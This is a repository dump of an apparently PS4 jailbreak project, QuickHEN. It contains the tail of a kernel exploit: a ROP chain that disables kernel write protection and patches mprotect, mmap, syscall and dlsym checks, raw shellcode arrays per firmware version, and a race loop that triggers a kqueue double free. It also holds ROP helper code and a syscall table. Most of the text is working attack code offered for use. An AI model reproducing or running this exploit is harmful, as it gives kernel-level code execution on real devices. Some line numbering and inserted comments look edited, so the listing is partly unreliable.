530 | 			krop.push(window.gadgets["mov rax, [rax]"]);
531 | 			krop.push(window.gadgets["pop rcx"]);
532 | 			krop.push(0x10349A8);
533 | 			krop.push(window.gadgets["add rax, rcx"]);
534 | 			krop.push(window.gadgets["mov [rax], rsi"]);
535 | 			krop.push(window.gadgets["pop rax"])
536 | 			krop.push(kscratch.add32(0x90));
537 | 			krop.push(window.gadgets["mov rax, [rax]"]);
538 | 			krop.push(window.gadgets["pop rcx"]);
539 | 			krop.push(0x10349C8);
540 | 			krop.push(window.gadgets["add rax, rcx"]);
541 | 			krop.push(window.gadgets["pop rsi"]);
542 | 			krop.push(kernel_exec_param);
543 | 			krop.push(window.gadgets["mov [rax], rsi"]);
544 | 			
545 | 			// Enable kernel write protection
546 | 			krop.push(window.gadgets["pop rax"])
547 | 			krop.push(kscratch.add32(0x90));
548 | 			krop.push(window.gadgets["mov rax, [rax]"]);
549 | 			krop.push(window.gadgets["pop rcx"]);
550 | 			krop.push(0x283120);
551 | 			krop.push(window.gadgets["add rax, rcx"]);
552 | 			krop.push(window.gadgets["jmp rax"]);
553 | 			
554 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
555 | 			krop.push(kscratch);
556 | 			krop.push(window.gadgets["mov [rdi], rax"]);
557 | 			
558 | 		} else if (fwFromUA == "4.55") {
559 | 			
560 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
561 | 			krop.push(window.gadgets["pop rcx"]);
562 | 			krop.push(0x1E2640); // Slide of the return ptr from kernel base
563 | 			krop.push(window.gadgets["sub rax, rcx"]);
564 | 			krop.push(window.gadgets["mov rdx, rax"]);
565 | 			krop.push(window.gadgets["pop rsi"]);
566 | 			krop.push(kscratch.add32(0x90));
567 | 			krop.push(window.gadgets["mov [rsi], rdx"]);
568 | 			
569 | 			
570 | 			krop.push(window.gadgets["pop rax"]);
571 | 			krop.push(window.gadgets["test"]);
572 | 			krop.push(window.gadgets["mov [rdi], rax"]);
573 | 			
574 | 			
575 | 			
576 | 			// Disable kernel write protection
577 | 			krop.push(window.gadgets["pop rax"])
578 | 			krop.push(kscratch.add32(0x90));
579 | 			krop.push(window.gadgets["mov rax, [rax]"]);
580 | 			krop.push(window.gadgets["pop rcx"]);
581 | 			krop.push(0x280f79);
582 | 			krop.push(window.gadgets["add rax, rcx"]);
583 | 			krop.push(window.gadgets["mov rdx, rax"]);
584 | 			krop.push(window.gadgets["pop rax"]);
585 | 			krop.push(0x80040033);
586 | 			krop.push(window.gadgets["jmp rdx_more"]);
587 | 			
588 | 			// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
589 | 			// E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
590 | 			var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
591 | 			krop.push(window.gadgets["pop rax"])
592 | 			krop.push(kscratch.add32(0x90));
593 | 			krop.push(window.gadgets["mov rax, [rax]"]);
594 | 			krop.push(window.gadgets["pop rcx"]);
595 | 			krop.push(0x1144E3);
596 | 			krop.push(window.gadgets["add rax, rcx"]);
597 | 			krop.push(window.gadgets["pop rsi"]);
598 | 			krop.push(kexploit_check_patch);
599 | 			krop.push(window.gadgets["mov [rax], rsi"]);
600 | 			
601 | 			// Patch mprotect: Allow RWX (read-write-execute) mapping
602 | 			var mprotect_patch = new int64(0x9090EA38, 0x90909090);
603 | 			krop.push(window.gadgets["pop rax"])
604 | 			krop.push(kscratch.add32(0x90));
605 | 			krop.push(window.gadgets["mov rax, [rax]"]);
606 | 			krop.push(window.gadgets["pop rcx"]);
607 | 			krop.push(0x396A56);
608 | 			krop.push(window.gadgets["add rax, rcx"]);
609 | 			krop.push(window.gadgets["pop rsi"]);
610 | 			krop.push(mprotect_patch);
611 | 			krop.push(window.gadgets["mov [rax], rsi"]);
612 | 			
613 | 			// Patch sys_mmap: Allow RWX (read-write-execute) mapping
614 | 			var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
615 | 			krop.push(window.gadgets["pop rax"])
616 | 			krop.push(kscratch.add32(0x90));
617 | 			krop.push(window.gadgets["mov rax, [rax]"]);
618 | 			krop.push(window.gadgets["pop rcx"]);
619 | 			krop.push(0x141D14);
620 | 			krop.push(window.gadgets["add rax, rcx"]);
621 | 			krop.push(window.gadgets["pop rsi"]);
622 | 			krop.push(kernel_mmap_patch);
623 | 			krop.push(window.gadgets["mov [rax], rsi"]);
624 | 			
625 | 			// Patch syscall: syscall instruction allowed anywhere
626 | 			var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
627 | 			var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
628 | 			krop.push(window.gadgets["pop rax"])
629 | 			krop.push(kscratch.add32(0x90));
630 | 			krop.push(window.gadgets["mov rax, [rax]"]);
631 | 			krop.push(window.gadgets["pop rcx"]);
632 | 			krop.push(0x3DC603);
633 | 			krop.push(window.gadgets["add rax, rcx"]);
634 | 			krop.push(window.gadgets["pop rsi"]);
635 | 			krop.push(kernel_syscall_patch1);
636 | 			krop.push(window.gadgets["mov [rax], rsi"]);
637 | 			krop.push(window.gadgets["pop rax"])
638 | 			krop.push(kscratch.add32(0x90));
639 | 			krop.push(window.gadgets["mov rax, [rax]"]);
640 | 			krop.push(window.gadgets["pop rcx"]);
641 | 			krop.push(0x3DC621);
642 | 			krop.push(window.gadgets["add rax, rcx"]);
643 | 			krop.push(window.gadgets["pop rsi"]);
644 | 			krop.push(kernel_syscall_patch2);
645 | 			krop.push(window.gadgets["mov [rax], rsi"]);
646 | 			
647 | 			// Patch sys_dynlib_dlsym: Allow from anywhere
648 | 			var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
649 | 			var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
650 | 			krop.push(window.gadgets["pop rax"])
651 | 			krop.push(kscratch.add32(0x90));
652 | 			krop.push(window.gadgets["mov rax, [rax]"]);
653 | 			krop.push(window.gadgets["pop rcx"]);
654 | 			krop.push(0x3CF6FE);
655 | 			krop.push(window.gadgets["add rax, rcx"]);
656 | 			krop.push(window.gadgets["pop rsi"]);
657 | 			krop.push(kernel_dlsym_patch1);
658 | 			krop.push(window.gadgets["mov [rax], rsi"]);
659 | 			krop.push(window.gadgets["pop rax"])
660 | 			krop.push(kscratch.add32(0x90));
661 | 			krop.push(window.gadgets["mov rax, [rax]"]);
662 | 			krop.push(window.gadgets["pop rcx"]);
663 | 			krop.push(0x690C0);
664 | 			krop.push(window.gadgets["add rax, rcx"]);
665 | 			krop.push(window.gadgets["pop rsi"]);
666 | 			krop.push(kernel_dlsym_patch2);
667 | 			krop.push(window.gadgets["mov [rax], rsi"]);
668 | 			
669 | 			// Add custom sys_exec() call to execute arbitrary code as kernel
670 | 			var kernel_exec_param = new int64(0, 1);
671 | 			krop.push(window.gadgets["pop rax"])
672 | 			krop.push(kscratch.add32(0x90));
673 | 			krop.push(window.gadgets["mov rax, [rax]"]);
674 | 			krop.push(window.gadgets["pop rcx"]);
675 | 			krop.push(0x102b8a0);
676 | 			krop.push(window.gadgets["add rax, rcx"]);
677 | 			krop.push(window.gadgets["pop rsi"]);
678 | 			krop.push(0x02);
679 | 			krop.push(window.gadgets["mov [rax], rsi"]);
680 | 			krop.push(window.gadgets["pop rsi"])
681 | 			krop.push(0x13a39f); // jmp qword ptr [rsi],done
682 | 			krop.push(window.gadgets["pop rdi"])
683 | 			krop.push(kscratch.add32(0x90));
684 | 			krop.push(window.gadgets["add rsi, [rdi]; mov rax, rsi"]);
685 | 			krop.push(window.gadgets["pop rax"])
686 | 			krop.push(kscratch.add32(0x90));
687 | 			krop.push(window.gadgets["mov rax, [rax]"]);
688 | 			krop.push(window.gadgets["pop rcx"]);
689 | 			krop.push(0x102b8a8);
690 | 			krop.push(window.gadgets["add rax, rcx"]);
691 | 			krop.push(window.gadgets["mov [rax], rsi"]);
692 | 			krop.push(window.gadgets["pop rax"])
693 | 			krop.push(kscratch.add32(0x90));
694 | 			krop.push(window.gadgets["mov rax, [rax]"]);
695 | 			krop.push(window.gadgets["pop rcx"]);
696 | 			krop.push(0x102b8c8);
697 | 			krop.push(window.gadgets["add rax, rcx"]);
698 | 			krop.push(window.gadgets["pop rsi"]);
699 | 			krop.push(kernel_exec_param);
700 | 			krop.push(window.gadgets["mov [rax], rsi"]);
701 | 			
702 | 			// Enable kernel write protection
703 | 			krop.push(window.gadgets["pop rax"])
704 | 			krop.push(kscratch.add32(0x90));
705 | 			krop.push(window.gadgets["mov rax, [rax]"]);
706 | 			krop.push(window.gadgets["pop rcx"]);
707 | 			krop.push(0x280f70);
708 | 			krop.push(window.gadgets["add rax, rcx"]);
709 | 			krop.push(window.gadgets["jmp rax"]);
710 | 			
711 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
712 | 			krop.push(kscratch);
713 | 			krop.push(window.gadgets["mov [rdi], rax"]);
714 | 			
715 | 		}
716 | 		
717 | 		krop.push(window.gadgets["ret2userland"]);
718 | 		krop.push(kscratch.add32(0x1000));
719 | 		
720 | 		// END OF KROP
721 | 		
722 | 		var kq = p.malloc32(0x10);
723 | 		var kev = p.malloc32(0x100);
724 | 		kev.backing[0] = sock;
725 | 		kev.backing[2] = 0x1ffff;
726 | 		kev.backing[3] = 1;
727 | 		kev.backing[4] = 5;
728 | 		
729 | 		// Shellcode to clean up memory
730 | 		if (fwFromUA == "5.01") {
731 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
732 | 		} else if (fwFromUA == "5.05") {
733 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
734 | 		} else if (fwFromUA == "4.74") {
735 | 			var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0x48302494, 0x8d4dffcf, 0xcdf024b4, 0x8d4d000e, 0xc76024ac, 0x8149ffd0, 0x660570c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
736 | 		} else if (fwFromUA == "4.55") {
737 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
738 | 		}
739 | 		
740 | 		var shellbuf = p.malloc32(0x1000);
741 | 		for (var i = 0; i < shcode.length; i++)
742 | 			shellbuf.backing[i] = shcode[i];
743 | 		
744 | 		// RACE!
745 | 		var race = new rop();
746 | 		start1();
747 | 		while (1) {
748 | 			race.count = 0;
749 | 			
750 | 			// Create a kqueue
751 | 			race.push(window.syscalls[362]);
752 | 			race.push(window.gadgets["pop rdi"]);
753 | 			race.push(kq);
754 | 			race.push(window.gadgets["mov [rdi], rax"]);
755 | 			
756 | 			// Race against the other thread
757 | 			race.push(window.gadgets["ret"]);
758 | 			race.push(window.gadgets["ret"]);
759 | 			race.push(window.gadgets["ret"]);
760 | 			race.push(window.gadgets["ret"]);
761 | 			race.push_write8(loop1, interrupt1);
762 | 			race.push(window.gadgets["pop rdi"]);
763 | 			race.push(fd);
764 | 			race.push(window.gadgets["pop rsi"]);
765 | 			race.push(0x8010427B);
766 | 			race.push(window.gadgets["pop rdx"]);
767 | 			race.push(bpf_valid_prog);
768 | 			race.push(window.syscalls[54]);
769 | 			
770 | 			// Attempt to trigger double free()
771 | 			race.push(window.gadgets["pop rax"]);
772 | 			race.push(kq);
773 | 			race.push(window.gadgets["mov rax, [rax]"]);
774 | 			race.push(window.gadgets["pop rdi"]);
775 | 			race.push(0);
776 | 			race.push(window.gadgets["add rdi, rax"]);
777 | 			race.push(window.gadgets["pop rsi"]);
778 | 			race.push(kev);
779 | 			race.push(window.gadgets["pop rdx"]);
780 | 			race.push(1);
781 | 			race.push(window.gadgets["pop rcx"]);
782 | 			race.push(0);
783 | 			race.push(window.gadgets["pop r8"]);
784 | 			race.push(0);
785 | 			race.push(window.syscalls[363]);
786 | 			
787 | 			// Spray via ioctl
788 | 			race.push(window.gadgets["pop rdi"]);
789 | 			race.push(fd1);
790 | 			race.push(window.gadgets["pop rsi"]);
791 | 			race.push(0x8010427B);
792 | 			race.push(window.gadgets["pop rdx"]);
793 | 			race.push(bpf_spray_prog);
794 | 			race.push(window.syscalls[54]);
795 | 			
796 | 			// Close the poisoned kqueue and run the kROP chain!
797 | 			race.push(window.gadgets["pop rax"]);
798 | 			race.push(kq);
799 | 			race.push(window.gadgets["mov rax, [rax]"]);
800 | 			race.push(window.gadgets["pop rdi"]);
801 | 			race.push(0);
802 | 			race.push(window.gadgets["add rdi, rax"]);
803 | 			race.push(window.syscalls[6]);
804 | 			
805 | 			// alert("Gotta go fast!"); // for kexploit debugging
806 | 			race.run();
807 | 			
808 | 			if (kscratch.backing[0] != 0) {
809 | 				
810 | 				// Clean up memory
811 | 				p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
812 | 				p.fcall(shellbuf);
813 | 				
814 | 				return true;
815 | 			}
816 | 		}
817 | 	} catch(ex) {
818 | 		fail(ex)
819 | 	}
820 | 	
821 | 	// failed (should never go here)
822 | 	return false;
823 | }


--------------------------------------------------------------------------------
/QuickHEN/offline.manifest:
--------------------------------------------------------------------------------
 1 | CACHE MANIFEST
 2 | 
 3 | index.html
 4 | expl.js
 5 | rop.js
 6 | syscalls.js
 7 | userland.js
 8 | kernel.js
 9 | kdumper.bin
10 | unblocker.bin
11 | ps4-hen-vtx-455.bin
12 | ps4-hen-vtx-505.bin
13 | fake_installer.bin
14 | 
15 | FALLBACK:
16 | . offline.html


--------------------------------------------------------------------------------
/QuickHEN/ps4-hen-vtx-455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/ps4-hen-vtx-455.bin


--------------------------------------------------------------------------------
/QuickHEN/ps4-hen-vtx-505.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/ps4-hen-vtx-505.bin


--------------------------------------------------------------------------------
/QuickHEN/rop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
 93 |       this.push(gadgets["pop rdi"]);
 94 |       this.push(where);
 95 |       this.push(gadgets["pop rsi"]);
 96 |       this.push(what);
 97 |       this.push(gadgets["mov [rdi], rsi"]);
 98 |   }
 99 | 
100 |   this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
101 |   {
102 |     if (rdi != undefined) {
103 |       this.push(gadgets["pop rdi"]);
104 |       this.push(rdi);
105 |     }
106 | 
107 |     if (rsi != undefined) {
108 |       this.push(gadgets["pop rsi"]);
109 |       this.push(rsi);
110 |     }
111 | 
112 |     if (rdx != undefined) {
113 |       this.push(gadgets["pop rdx"]);
114 |       this.push(rdx);
115 |     }
116 | 
117 |     if (rcx != undefined) {
118 |       this.push(gadgets["pop rcx"]);
119 |       this.push(rcx);
120 |     }
121 | 
122 |     if (r8 != undefined) {
123 |       this.push(gadgets["pop r8"]);
124 |       this.push(r8);
125 |     }
126 |     
127 |     if (r9 != undefined) {
128 |       this.push(gadgets["pop r9"]);
129 |       this.push(r9);
130 |     }
131 | 
132 |     this.push(rip);
133 |     return this;
134 |   }
135 |   
136 |   this.run = function() {
137 |       var retv = p.loadchain(this, this.notimes);
138 |       this.clear();
139 |       return retv;
140 |   }
141 |   
142 |   return this;
143 | };


--------------------------------------------------------------------------------
/QuickHEN/syscalls.js:
--------------------------------------------------------------------------------
  1 | // NOTE: window.syscallnames is only assigned further down this file (the function
  2 | // declaration swapkeyval is hoisted, but the assignment to window.syscallnames is
  3 | // not), so at this point swapkeyval() receives undefined, its for-in loop iterates
  4 | // nothing, and window.nameforsyscall is an empty object. Move this line below the
  5 | // table, or call swapkeyval() again after it, if the reverse map is actually needed.
  6 | window.nameforsyscall = swapkeyval(window.syscallnames);
  2 | window.syscalls       = {};
  3 | 
  4 | /* Get syscall name by index */
  5 | function swapkeyval(json){
  6 |   var ret = {};
  7 |   for(var key in json){
  8 |     if (json.hasOwnProperty(key)) {
  9 |       ret[json[key]] = key;
 10 |     }
 11 |   }
 12 |   return ret;
 13 | }
 14 | 
 15 | /* A long ass map of system call names -> number, you shouldn't need to touch this */
 16 | window.syscallnames =
 17 | {
 18 |   "sys_exit": 1,
 19 |   "sys_fork": 2,
 20 |   "sys_read": 3,
 21 |   "sys_write": 4,
 22 |   "sys_open": 5,
 23 |   "sys_close": 6,
 24 |   "sys_wait4": 7,
 25 |   "sys_unlink": 10,
 26 |   "sys_chdir": 12,
 27 |   "sys_chmod": 15,
 28 |   "sys_getpid": 20,
 29 |   "sys_setuid": 23,
 30 |   "sys_getuid": 24,
 31 |   "sys_geteuid": 25,
 32 |   "sys_recvmsg": 27,
 33 |   "sys_sendmsg": 28,
 34 |   "sys_recvfrom": 29,
 35 |   "sys_accept": 30,
 36 |   "sys_getpeername": 31,
 37 |   "sys_getsockname": 32,
 38 |   "sys_access": 33,
 39 |   "sys_chflags": 34,
 40 |   "sys_fchflags": 35,
 41 |   "sys_sync": 36,
 42 |   "sys_kill": 37,
 43 |   "sys_stat": 38,
 44 |   "sys_getppid": 39,
 45 |   "sys_dup": 41,
 46 |   "sys_pipe": 42,
 47 |   "sys_getegid": 43,
 48 |   "sys_profil": 44,
 49 |   "sys_getgid": 47,
 50 |   "sys_getlogin": 49,
 51 |   "sys_setlogin": 50,
 52 |   "sys_sigaltstack": 53,
 53 |   "sys_ioctl": 54,
 54 |   "sys_reboot": 55,
 55 |   "sys_revoke": 56,
 56 |   "sys_execve": 59,
 57 |   "sys_msync": 65,
 58 |   "sys_munmap": 73,
 59 |   "sys_mprotect": 74,
 60 |   "sys_madvise": 75,
 61 |   "sys_mincore": 78,
 62 |   "sys_getgroups": 79,
 63 |   "sys_setgroups": 80,
 64 |   "sys_setitimer": 83,
 65 |   "sys_getitimer": 86,
 66 |   "sys_getdtablesize": 89,
 67 |   "sys_dup2": 90,
 68 |   "sys_fcntl": 92,
 69 |   "sys_select": 93,
 70 |   "sys_fsync": 95,
 71 |   "sys_setpriority": 96,
 72 |   "sys_socket": 97,
 73 |   "sys_connect": 98,
 74 |   "sys_getpriority": 100,
 75 |   "sys_send": 101,
 76 |   "sys_recv": 102,
 77 |   "sys_bind": 104,
 78 |   "sys_setsockopt": 105,
 79 |   "sys_listen": 106,
 80 |   "sys_recvmsg": 113, // duplicate key: in an object literal the later entry wins, so sys_recvmsg resolves to 113, not 27
 81 |   "sys_sendmsg": 114, // duplicate key: later entry wins, so sys_sendmsg resolves to 114, not 28
 82 |   "sys_gettimeofday": 116,
 83 |   "sys_getrusage": 117,
 84 |   "sys_getsockopt": 118,
 85 |   "sys_readv": 120,
 86 |   "sys_writev": 121,
 87 |   "sys_settimeofday": 122,
 88 |   "sys_fchmod": 124,
 89 |   "sys_recvfrom": 125, // duplicate key: later entry wins, so sys_recvfrom resolves to 125, not 29
 90 |   "sys_setreuid": 126,
 91 |   "sys_setregid": 127,
 92 |   "sys_rename": 128,
 93 |   "sys_flock": 131,
 94 |   "sys_sendto": 133,
 95 |   "sys_shutdown": 134,
 96 |   "sys_socketpair": 135,
 97 |   "sys_mkdir": 136,
 98 |   "sys_rmdir": 137,
 99 |   "sys_utimes": 138,
100 |   "sys_adjtime": 140,
101 |   "sys_getpeername": 141, // duplicate key: later entry wins, so sys_getpeername resolves to 141, not 31
102 |   "sys_setsid": 147,
103 |   "sys_sysarch": 165,
104 |   "sys_setegid": 182,
105 |   "sys_seteuid": 183,
106 |   "sys_fstat": 189,
107 |   "sys_lstat": 190,
108 |   "sys_pathconf": 191,
109 |   "sys_fpathconf": 192,
110 |   "sys_getrlimit": 194,
111 |   "sys_setrlimit": 195,
112 |   "sys_getdirentries": 196,
113 |   "sys___sysctl": 202,
114 |   "sys_mlock": 203,
115 |   "sys_munlock": 204,
116 |   "sys_futimes": 206,
117 |   "sys_poll": 209,
118 |   "sys_clock_gettime": 232,
119 |   "sys_clock_settime": 233,
120 |   "sys_clock_getres": 234,
121 |   "sys_ktimer_create": 235,
122 |   "sys_ktimer_delete": 236,
123 |   "sys_ktimer_settime": 237,
124 |   "sys_ktimer_gettime": 238,
125 |   "sys_ktimer_getoverrun": 239,
126 |   "sys_nanosleep": 240,
127 |   "sys_rfork": 251,
128 |   "sys_issetugid": 253,
129 |   "sys_getdents": 272,
130 |   "sys_preadv": 289,
131 |   "sys_pwritev": 290,
132 |   "sys_getsid": 310,
133 |   "sys_aio_suspend": 315,
134 |   "sys_mlockall": 324,
135 |   "sys_munlockall": 325,
136 |   "sys_sched_setparam": 327,
137 |   "sys_sched_getparam": 328,
138 |   "sys_sched_setscheduler": 329,
139 |   "sys_sched_getscheduler": 330,
140 |   "sys_sched_yield": 331,
141 |   "sys_sched_get_priority_max": 332,
142 |   "sys_sched_get_priority_min": 333,
143 |   "sys_sched_rr_get_interval": 334,
144 |   "sys_utrace": 335,
145 |   "sys_sigprocmask": 340,
147 |   "sys_sigsuspend": 341,
148 |   "sys_sigpending": 343,
149 |   "sys_sigtimedwait": 345,
150 |   "sys_sigwaitinfo": 346,
151 |   "sys_kqueue": 362,
152 |   "sys_kevent": 363,
153 |   "sys_uuidgen": 392,
154 |   "sys_sendfile": 393,
155 |   "sys_fstatfs": 397,
156 |   "sys_ksem_close": 400,
157 |   "sys_ksem_post": 401,
158 |   "sys_ksem_wait": 402,
159 |   "sys_ksem_trywait": 403,
160 |   "sys_ksem_init": 404,
161 |   "sys_ksem_open": 405,
162 |   "sys_ksem_unlink": 406,
163 |   "sys_ksem_getvalue": 407,
164 |   "sys_ksem_destroy": 408,
165 |   "sys_sigaction": 416,
166 |   "sys_sigreturn": 417,
167 |   "sys_getcontext": 421,
168 |   "sys_setcontext": 422,
169 |   "sys_swapcontext": 423,
170 |   "sys_sigwait": 429,
171 |   "sys_thr_create": 430,
172 |   "sys_thr_exit": 431,
173 |   "sys_thr_self": 432,
174 |   "sys_thr_kill": 433,
175 |   "sys_ksem_timedwait": 441,
176 |   "sys_thr_suspend": 442,
177 |   "sys_thr_wake": 443,
178 |   "sys_kldunloadf": 444,
179 |   "sys__umtx_op": 454,
181 |   "sys_thr_new": 455,
182 |   "sys_sigqueue": 456,
183 |   "sys_thr_set_name": 464,
184 |   "sys_rtprio_thread": 466,
185 |   "sys_pread": 475,
186 |   "sys_pwrite": 476,
187 |   "sys_mmap": 477,
188 |   "sys_lseek": 478,
189 |   "sys_truncate": 479,
190 |   "sys_ftruncate": 480,
191 |   "sys_thr_kill2": 481,
192 |   "sys_shm_open": 482,
193 |   "sys_shm_unlink": 483,
194 |   "sys_cpuset_getid": 486,
195 |   "sys_cpuset_getaffinity": 487,
196 |   "sys_cpuset_setaffinity": 488,
197 |   "sys_openat": 499,
198 |   "sys_pselect": 522,
199 | 
200 |   "sys_regmgr_call": 532,
201 |   "sys_jitshm_create": 533,
202 |   "sys_jitshm_alias": 534,
203 |   "sys_dl_get_list": 535,
204 |   "sys_dl_get_info": 536,
205 |   "sys_dl_notify_event": 537,
206 |   "sys_evf_create": 538,
207 |   "sys_evf_delete": 539,
208 |   "sys_evf_open": 540,
209 |   "sys_evf_close": 541,
210 |   "sys_evf_wait": 542,
211 |   "sys_evf_trywait": 543,
212 |   "sys_evf_set": 544,
213 |   "sys_evf_clear": 545,
214 |   "sys_evf_cancel": 546,
215 |   "sys_query_memory_protection": 547,
216 |   "sys_batch_map": 548,
217 |   "sys_osem_create": 549,
